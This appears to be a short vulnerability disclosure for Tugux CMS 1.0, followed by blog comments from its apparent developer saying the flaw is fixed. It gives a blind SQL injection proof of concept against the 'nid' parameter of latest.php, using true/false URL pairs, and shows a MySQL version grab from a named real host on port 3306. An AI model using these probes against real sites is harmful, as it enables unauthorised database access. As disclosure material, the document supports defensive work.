===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False
[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
HI i am the deveoper of the Tugux CMS.. thanks to tell me about security fix. i fixed the security leak. to prevent TUGUX CMS by SQL injection... once again thanks. if you want to help us improve tugux CMS. you can join our team
ReplyDeleteMy email is yousaf@tugux.com
ReplyDelete